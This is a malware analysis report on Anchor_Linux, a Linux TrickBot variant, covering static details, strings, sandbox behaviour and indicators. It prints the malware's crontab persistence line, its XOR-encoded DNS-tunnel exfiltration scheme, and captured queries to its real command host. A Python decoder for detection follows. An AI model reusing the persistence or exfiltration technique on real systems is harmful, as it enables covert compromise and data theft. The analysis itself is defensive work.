Malware Analysis: Anchor_Linux

Aug 6, 2020 • malware_analysis

Disclaimer

The following is a Malware analysis report for the binary with SHA-256 hash c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc.
The binary can be downloaded from MalShare.
I take no responsibility for any actions you take based on this report.
Use caution when downloading and executing malware.
Use a virtual machine, be safe, have fun.

Opinions

In my last post I took a look at TrickBot malware. This post will focus on Anchor_Linux, otherwise known as TrickBot for Linux.

As we will see in the analysis this sample functions very similarly to TrickBot on Windows, and utilizes Anchor_DNS as the C2 infrastructure.
This means that both this Linux malware and newer TrickBot variants on Windows can use the same C2 infrastructure.

As I mentioned in my last post, TrickBot will continue to evolve until it is no longer profitable.
Right now one of the biggest ways for these bad actors to turn a profit is cryptocurrency mining.
While mining from a single machine is not very profitable, if you are able to distribute the mining across several hundred or thousand machines, especially ones whose overhead you do not have to worry about, it can become rather profitable.
Linux is by far the most popular OS for servers on the internet, so it was only a matter of time before we saw this evolution.

I only ran this sample for a short period so I did not see a stage two payload, only the initial discovery and beaconing.

Analysis Summary

When executed this malware immediately appends a line to /etc/crontab to set up persistence.
This line ensures the malware is run every minute.

*/1 * * * * root /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042

Once persistence is set up the malware executes uname to gather host details, and reads every /proc/$PID/cmdline file to gather information on all running processes.
A web request is made to an external site to gather the host's external IP address.
In the strings we saw that there are several http and https options available.

http://checkip.amazonaws.com
http://ipecho.net/plain
http://ipinfo.io/ip
http://api.ipify.org
http://icanhazip.com
http://myexternalip.com/raw
http://wtfismyip.com/text
http://ip.anysrc.net/plain/clientip
https://checkip.amazonaws.com
https://ipecho.net/plain
https://ipinfo.io/ip
https://api.ipify.org
https://icanhazip.com
https://myexternalip.com/raw
https://wtfismyip.com/text
https://ip.anysrc.net/plain/clientip

Based on what we saw in the pcap, the list of sites is likely iterated over until a result is returned.
In this case the first request returned a result, and no further requests were made.

Once the Discovery portion is complete the malware compiles the data in a format known to the Anchor_DNS C2 infrastructure.
The format is /anchor_linux/hostname_version/.client_id/#/LVER/1001/public_ip/payload, which is then xor’d with 0xb9 and hex encoded.

As we see in the pcap, packet 20 looks like this:

20   9.602723 192.168.1.101 → 192.168.1.1  DNS 314 Standard query 0x1916 A 898A926AB2D9AFF7CD2FFB3BE8A8A0545BB9BA96D8D7DAD1D6CBE6D5D0D7CCC.196CBDCD4D7CCC1E6F58D888C89888888978F8EFBFF8F81FD80FDFD89FF8DFD.8E8B808B898DFF88FB8EFB8D8AF8F8F888FF968996F58D888C8988888896888.989889688898E97888C8197888C97888896FF81.biillpi.com OPT

A DNS query for some_long_string.biillpi.com.
If we take everything before .biillpi[.]com, remove the ‘.’s, hex decode it, and xor it with a key of 0xb9 we get the following:

03+Ó.`.Nt.B.Q..íâ../anchor_linux/remnux_L4150111.67BF68D9DD0F4D729204F1B7B43AAA1F/0/L4150111/1001/107.158.15.11/F8

Once this initial discovery and exfiltration phase is complete the malware continues to beacon using the Anchor_DNS framework.
Any subsequent payloads will be provided as answers to the queries.
In this run we did not see a stage two, or any subsequent payload delivery.
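As an added example (not code from the original post or from the malware itself), the following Python performs the decoding described above on the query names taken from this report's pcap and splits the result into the fields of the Anchor_DNS format; the treatment of the bytes before /anchor_linux/ as an opaque header and the 17-byte header comparison are assumptions drawn from the two samples. It goes beyond the single check-in query by also decoding the short beacon from packet 34 in the C2 Beaconing section, which carries no host block but shares the same header prefix.

```python
import re

XOR_KEY = 0xB9
C2_ZONE = "biillpi.com"

# Query names copied from the pcap in this report: packet 20 (the host
# information check-in) and packet 34 (a short beacon sent afterwards).
PACKET_20_QNAME = (
    "898A926AB2D9AFF7CD2FFB3BE8A8A0545BB9BA96D8D7DAD1D6CBE6D5D0D7CCC."
    "196CBDCD4D7CCC1E6F58D888C89888888978F8EFBFF8F81FD80FDFD89FF8DFD."
    "8E8B808B898DFF88FB8EFB8D8AF8F8F888FF968996F58D888C8988888896888."
    "989889688898E97888C8197888C97888896FF81.biillpi.com"
)
PACKET_34_QNAME = "898A926AB2D9AFF7CD2FFB3BE8A8A0545BBBBA96.biillpi.com"

HEX_LABELS = re.compile(r"^[0-9A-Fa-f]+(\.[0-9A-Fa-f]+)*$")


def decode_anchor_qname(qname, zone=C2_ZONE, key=XOR_KEY):
    """Strip the C2 zone, join the hex labels, hex-decode, XOR every byte with key.

    Returns None when the name is not shaped like an Anchor_DNS query
    (wrong zone, non-hex labels, or an odd number of hex digits).
    """
    name = qname.rstrip(".")
    suffix = "." + zone
    if not name.lower().endswith(suffix):
        return None
    labels = name[: -len(suffix)]
    hexdata = labels.replace(".", "")
    if not HEX_LABELS.match(labels) or len(hexdata) % 2:
        return None
    return bytes(b ^ key for b in bytes.fromhex(hexdata))


def parse_anchor_beacon(decoded):
    """Split a decoded check-in into the fields named in the analysis summary.

    Layout observed in packet 20 (bytes before the marker are treated as an
    opaque header; hostname_version and client_id share one path segment,
    joined by '.'):
      <header>/anchor_linux/<hostname_version>.<client_id>/<#>/<LVER>/1001/<public_ip>/<payload>
    Returns None for a bare beacon that carries no /anchor_linux/ block.
    """
    marker = b"/anchor_linux/"
    idx = decoded.find(marker)
    if idx < 0:
        return None
    body = decoded[idx + len(marker):].decode("ascii", errors="replace")
    parts = body.split("/", 5)
    if len(parts) != 6:
        return None
    host_and_id, counter, lver, const, public_ip, payload = parts
    hostname_version, _, client_id = host_and_id.partition(".")
    return {"header": decoded[:idx], "hostname_version": hostname_version,
            "client_id": client_id, "counter": counter, "lver": lver,
            "const": const, "public_ip": public_ip, "payload": payload}


def shares_client_header(beacon, checkin, length=17):
    """True when two decoded queries start with the same header bytes; packets
    20 and 34 agree on their first 17 bytes (an assumption from two samples)."""
    return beacon[:length] == checkin[:length]
```

Running decode_anchor_qname on every query under the C2 zone in a DNS log and keeping only names that decode to a /anchor_linux/ block is a practical way to separate check-ins from plain beacons.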

Based upon the strings we can also see that this malware has SMB capabilities.

smb://
URL does not start with 'smb://'

This reveals the cross-platform reach that this malware is intended to have.

Environment and tools


Static Analysis

Data Value
File Type ELF
Magic ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped
File Size 782424 bytes
MD5 7d2595904aa6feb46b3e8f3262963042
SHA1 32f485eece997ee331809e98495641f2bddf8b3f
SHA256 c721189a2b89cd279e9a033c93b8b5017dc165cba89eff5b8e1b5866195518bc
SHA512 77b36c4a46ae236b0e0bf5b839239b742e437d9d1990408165be0096defd6562976a0c4158fd2c9cd61287b785ecb178864ca379437e1304d6664593ca1115c5
SSDEEP 12288:Y4BABjvg6LhrRQNCU48lIOmEt/csWpD361AqRNZGO/1Tkvxq:YPLhx8lIOmmUbAAqRNI
Entry Point 0x404620

Sections

Name Address Size Offset Type Flags
- 0x0 0x0 0x0 NULL -
.interp 0x400270 0x1c 0x270 PROGBITS A
.note.ABI-tag 0x40028c 0x20 0x28c NOTE A
.hash 0x4002b0 0x48c 0x2b0 HASH A
.dynsym 0x400740 0xed0 0x740 DYNSYM A
.dynstr 0x401610 0x5e7 0x1610 STRTAB A
.gnu.version 0x401bf8 0x13c 0x1bf8 GNU_versym A
.gnu.version_r 0x401d38 0xd0 0x1d38 GNU_verneed A
.rela.dyn 0x401e08 0x180 0x1e08 RELA A
.rela.plt 0x401f88 0xdb0 0x1f88 RELA AI
.init 0x402d38 0x17 0x2d38 PROGBITS AX
.plt 0x402d50 0x930 0x2d50 PROGBITS AX
.plt.got 0x403680 0x20 0x3680 PROGBITS AX
.text 0x4036a0 0x70f32 0x36a0 PROGBITS AX
.fini 0x4745d4 0x9 0x745d4 PROGBITS AX
.rodata 0x4745e0 0x2d200 0x745e0 PROGBITS A
.eh_frame_hdr 0x4a17e0 0x3c14 0xa17e0 PROGBITS A
.eh_frame 0x4a53f8 0x15594 0xa53f8 PROGBITS A
.gcc_except_table 0x4ba98c 0x6cd 0xba98c PROGBITS A
.tdata 0x6bbb78 0x4 0xbbb78 PROGBITS WAT
.tbss 0x6bbb80 0x58 0xbbb7c NOBITS WAT
.init_array 0x6bbb80 0x18 0xbbb80 INIT_ARRAY WA
.fini_array 0x6bbb98 0x8 0xbbb98 FINI_ARRAY WA
.data.rel.ro 0x6bbba0 0x21b8 0xbbba0 PROGBITS WA
.dynamic 0x6bdd58 0x210 0xbdd58 DYNAMIC WA
.got 0x6bdf68 0x88 0xbdf68 PROGBITS WA
.got.plt 0x6be000 0x4a8 0xbe000 PROGBITS WA
.data 0x6be4c0 0x288 0xbe4c0 PROGBITS WA
.bss 0x6be760 0x1a28 0xbe748 NOBITS WA
.comment 0x0 0x3e 0xbe748 PROGBITS MS
.shstrtab 0x0 0x10c 0xbe786 STRTAB -

Symbols

Type Bind Vis Ndx Name
NOTYPE LOCAL DEFAULT UND  
NOTYPE WEAK DEFAULT UND _ZGTtnam
FUNC GLOBAL DEFAULT UND inet_ntop@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND getenv@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND dl_iterate_phdr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND free@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND recv@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND pthread_create@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND pthread_detach@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND abort@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __errno_location@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND srandom@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND unlink@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strncpy@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strncmp@GLIBC_2.2.5 (2)
OBJECT GLOBAL DEFAULT UND stdout@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strcpy@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND writev@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND islower@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND toupper@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND qsort@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fread@GLIBC_2.2.5 (2)
OBJECT GLOBAL DEFAULT UND stdin@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND vsnprintf@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND setsockopt@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __xpg_strerror_r@GLIBC_2.3.4 (4)
FUNC GLOBAL DEFAULT UND fcntl@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND write@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND getpid@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ITM_RU1
FUNC GLOBAL DEFAULT UND getpeername@GLIBC_2.2.5 (2)
FUNC WEAK DEFAULT UND pthread_once@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND fclose@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND opendir@GLIBC_2.2.5 (2)
FUNC WEAK DEFAULT UND __pthread_key_create@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND dcgettext@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strlen@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND getpwuid_r@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND chdir@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __stack_chk_fail@GLIBC_2.4 (5)
FUNC GLOBAL DEFAULT UND getuid@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND system@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND send@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND strchr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fgetpos@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND rewind@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND pthread_mutex_destroy@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND snprintf@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND nanosleep@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND strrchr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND ftruncate@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND uname@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND gmtime_r@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND dup@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND lseek@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND gettimeofday@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ITM_addUserCommitAction
FUNC GLOBAL DEFAULT UND fputs@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fnmatch@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ITM_memcpyRtWn
FUNC GLOBAL DEFAULT UND __strtok_r@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND memset@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND geteuid@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fscanf@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND ioctl@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND getcwd@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND sendto@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND close@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND setsid@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strspn@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND closedir@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fputc@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strcspn@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND memchr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND read@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND __libc_start_main@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND srand@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND memcmp@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fgets@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __tls_get_addr@GLIBC_2.3 (6)
FUNC GLOBAL DEFAULT UND getsockopt@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND execve@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND calloc@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strcmp@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND signal@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND syscall@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND feof@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND gmon_start
FUNC GLOBAL DEFAULT UND umask@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND if_nametoindex@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strtol@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND memcpy@GLIBC_2.14 (7)
FUNC GLOBAL DEFAULT UND inet_pton@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __xpg_basename@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND time@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fileno@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND inet_aton@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __xstat@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND readdir@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND random@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND get_current_dir_name@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND pthread_mutex_unlock@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND __rawmemchr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND malloc@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fflush@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __isoc99_sscanf@GLIBC_2.7 (8)
FUNC GLOBAL DEFAULT UND getifaddrs@GLIBC_2.3 (9)
FUNC GLOBAL DEFAULT UND __fxstat@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND listen@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND recvfrom@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND getlogin@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND clock_gettime@GLIBC_2.2.5 (10)
FUNC GLOBAL DEFAULT UND strpbrk@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fseek@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND realloc@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fdopen@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND asprintf@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ITM_RU8
FUNC GLOBAL DEFAULT UND freeifaddrs@GLIBC_2.3 (9)
FUNC GLOBAL DEFAULT UND poll@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND chmod@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND bind@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND readv@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND memmove@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND waitpid@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND atol@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND open@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND access@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND fopen@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ITM_memcpyRnWt
FUNC GLOBAL DEFAULT UND pthread_join@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND jrand48@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND accept@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND getsockname@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strtoul@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND flock@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __cxa_atexit@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strcat@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND gethostname@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND sprintf@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND getppid@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND connect@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND fwrite@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __fprintf_chk@GLIBC_2.3.4 (4)
FUNC GLOBAL DEFAULT UND getaddrinfo@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strdup@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strerror@GLIBC_2.2.5 (2)
NOTYPE WEAK DEFAULT UND _ZGTtdlPv
FUNC GLOBAL DEFAULT UND sleep@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND pthread_mutex_init@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND fork@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND strstr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND pthread_mutex_lock@GLIBC_2.2.5 (3)
FUNC GLOBAL DEFAULT UND rand@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND __ctype_tolower_loc@GLIBC_2.3 (9)
FUNC GLOBAL DEFAULT UND freeaddrinfo@GLIBC_2.2.5 (2)
OBJECT GLOBAL DEFAULT UND stderr@GLIBC_2.2.5 (2)
FUNC GLOBAL DEFAULT UND socket@GLIBC_2.2.5 (2)

Interesting Strings

/lib64/ld-linux-x86-64.so.2 (UNIX_PATH_REGEX)
/run/uui1 (UNIX_PATH_REGEX)
dd/reque (UNIX_PATH_REGEX)
Invalid address:%s  Can not resolv into IPv4/v6. (UNIX_PATH_REGEX)
Unknown address family :%d. Only IPv4/IPv6 supported so far. (UNIX_PATH_REGEX)
Can not decode info_type/info_class %d/%d yet (UNIX_PATH_REGEX)
smb:// (UNIX_PATH_REGEX)
URL does not start with 'smb://' (UNIX_PATH_REGEX)
Read/Write failed with (0x%08x) %s (UNIX_PATH_REGEX)
Can not enccode info_type/info_class %d/%d yet (UNIX_PATH_REGEX)
dev/null (UNIX_PATH_REGEX)
http://checkip.amazonaws.com (URL_REGEX, UNIX_PATH_REGEX)
http://ipecho.net/plain (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
http://ipinfo.io/ip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
http://api.ipify.org (URL_REGEX, UNIX_PATH_REGEX)
http://icanhazip.com (URL_REGEX, UNIX_PATH_REGEX)
http://myexternalip.com/raw (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
http://wtfismyip.com/text (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
http://ip.anysrc.net/plain/clientip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
https://checkip.amazonaws.com (URL_REGEX, UNIX_PATH_REGEX)
https://ipecho.net/plain (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
https://ipinfo.io/ip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
https://api.ipify.org (URL_REGEX, UNIX_PATH_REGEX)
https://icanhazip.com (URL_REGEX, UNIX_PATH_REGEX)
https://myexternalip.com/raw (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
https://wtfismyip.com/text (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
https://ip.anysrc.net/plain/clientip (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
20:06:55 (IPV6_REGEX)
20:06:57 (IPV6_REGEX)
20:06:57 (IPV6_REGEX)
20:06:58 (IPV6_REGEX)
MM/dd/yy (UNIX_PATH_REGEX)
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly> (URL_REGEX, DOMAIN_REGEX)
>/>J>i>{> (UNIX_PATH_REGEX)
>*>/>T> (UNIX_PATH_REGEX)
/etc/crontab (UNIX_PATH_REGEX)
/proc/%s/cmdline (UNIX_PATH_REGEX)
/tmp/anchor.log (UNIX_PATH_REGEX)
Couldn't read a file:// file (UNIX_PATH_REGEX)
URL using bad/illegal format or missing URL (UNIX_PATH_REGEX)
Failed writing received data to disk/application (UNIX_PATH_REGEX)
Upload failed (at start/before it took off) (UNIX_PATH_REGEX)
Failed to open/read local data from file/application (UNIX_PATH_REGEX)
Socket not ready for send/recv (UNIX_PATH_REGEX)
Stream error in the HTTP/2 framing layer (UNIX_PATH_REGEX)
HTTP/1.%d %d (UNIX_PATH_REGEX)
CONNECT %s HTTP/%s (UNIX_PATH_REGEX)
multipart/mixed (UNIX_PATH_REGEX)
application/octet-stream (UNIX_PATH_REGEX)
text/plain (UNIX_PATH_REGEX)
multipart/form-data (UNIX_PATH_REGEX)
image/gif (UNIX_PATH_REGEX)
image/jpeg (UNIX_PATH_REGEX)
image/png (UNIX_PATH_REGEX)
image/svg+xml (UNIX_PATH_REGEX)
text/html (UNIX_PATH_REGEX)
application/pdf (UNIX_PATH_REGEX)
application/xml (UNIX_PATH_REGEX)
oversized cookie dropped, name/val %zu + %zu bytes (UNIX_PATH_REGEX)
# https://curl.haxx.se/docs/http-cookies.html (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
Content-Range: bytes 0-%ld/%ld (UNIX_PATH_REGEX)
Content-Range: bytes %s%ld/%ld (UNIX_PATH_REGEX)
%s HTTP/%s (UNIX_PATH_REGEX)
Content-Type: application/x-www-form-urlencoded (UNIX_PATH_REGEX)
Received HTTP/0.9 when not allowed (UNIX_PATH_REGEX)
Lying server, not serving HTTP/2 (UNIX_PATH_REGEX)
HTTP/1.0 proxy connection set to keep alive! (UNIX_PATH_REGEX)
HTTP/1.1 proxy connection set close! (UNIX_PATH_REGEX)
HTTP/1.0 connection set to keep alive! (UNIX_PATH_REGEX)
Forcing HTTP/1.1 for NTLM (UNIX_PATH_REGEX)
Content-Range: bytes %s/%ld (UNIX_PATH_REGEX)
ftp://%s:%s@%s (UNIX_PATH_REGEX)
 HTTP/%1d.%1d%c%3d (UNIX_PATH_REGEX)
 HTTP/2 %d (UNIX_PATH_REGEX)
 RTSP/%1d.%1d%c%3d (UNIX_PATH_REGEX)
%s://%s (UNIX_PATH_REGEX)
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds (UNIX_PATH_REGEX)
 INFO/REPLY (UNIX_PATH_REGEX)
Cannot rewind mime/post data (UNIX_PATH_REGEX)
select/poll returned error (UNIX_PATH_REGEX)
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.) (UNIX_PATH_REGEX)
select/poll error (UNIX_PATH_REGEX)
Content-Type: text/parameters (UNIX_PATH_REGEX)
Content-Type: application/sdp (UNIX_PATH_REGEX)
Accept: application/sdp (UNIX_PATH_REGEX)
%s %s RTSP/1.0 (UNIX_PATH_REGEX)
Content-Type: application/dns-message (UNIX_PATH_REGEX)
0123456789abcdefABCDEF::. (IPV6_REGEX)
127.0.0.1/ (IPV4_REGEX)
file://%s%s%s (UNIX_PATH_REGEX)
%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (UNIX_PATH_REGEX)
%s/%s@%s (UNIX_PATH_REGEX)
failed to resume file:// transfer (UNIX_PATH_REGEX)
Bad PASV/EPSV response: %03d (UNIX_PATH_REGEX)
OS/400 (UNIX_PATH_REGEX)
Doing the SSL/TLS handshake on the data stream (UNIX_PATH_REGEX)
FTP response aborted due to select/poll error: %d (UNIX_PATH_REGEX)
/var/lib/libuuid/clock.txt (UNIX_PATH_REGEX)
/dev/random (UNIX_PATH_REGEX)
/dev/urandom (UNIX_PATH_REGEX)
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugsbasic_string::_M_create (URL_REGEX, DOMAIN_REGEX, UNIX_PATH_REGEX)
std::bad_alloc (IPV6_REGEX)
std::bad_cast (IPV6_REGEX)
std::bad_typeid (IPV6_REGEX)
std::bad_exception (IPV6_REGEX)

OSINT


Behavioral Analysis

Processes

PID User Command
1654 remnux sudo ./7d2595904aa6feb46b3e8f3262963042
1655 root ./7d2595904aa6feb46b3e8f3262963042
1660 root /bin/sh -c /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042
1663 root /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042
1664 root /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042
1667 root /bin/sh -c /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042
1668 root /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042

Modified Files

Process 1655 appended the following to /etc/crontab.

*/1 * * * * root /home/remnux/Downloads/7d2595904aa6feb46b3e8f3262963042

PCAP

Download

Protocols

Protocol Number of Packets
DNS 222
HTTP 2

Indicators of Compromise

  • *.biillpi[.]com

External IP Scraping

GET / HTTP/1.1
Host: checkip.amazonaws.com
User-Agent: test my ip
Accept: */*

HTTP/1.1 200 OK
Date: Thu, 06 Aug 2020 02:01:02 GMT
Server: lighttpd/1.4.53
Content-Length: 14
Connection: keep-alive

107.158.15.11

C2 Beaconing

34  10.874377 192.168.1.101 → 192.168.1.1  DNS 123 Standard query 0x85bf A 898A926AB2D9AFF7CD2FFB3BE8A8A0545BBBBA96.biillpi.com OPT
35  10.874542 192.168.1.101 → 192.168.1.1  DNS 123 Standard query 0xd994 AAAA 898A926AB2D9AFF7CD2FFB3BE8A8A0545BBBBA96.biillpi.com OPT

C2 Host Information Exfiltration

20   9.602723 192.168.1.101 → 192.168.1.1  DNS 314 Standard query 0x1916 A 898A926AB2D9AFF7CD2FFB3BE8A8A0545BB9BA96D8D7DAD1D6CBE6D5D0D7CCC.196CBDCD4D7CCC1E6F58D888C89888888978F8EFBFF8F81FD80FDFD89FF8DFD.8E8B808B898DFF88FB8EFB8D8AF8F8F888FF968996F58D888C8988888896888.989889688898E97888C8197888C97888896FF81.biillpi.com OPT
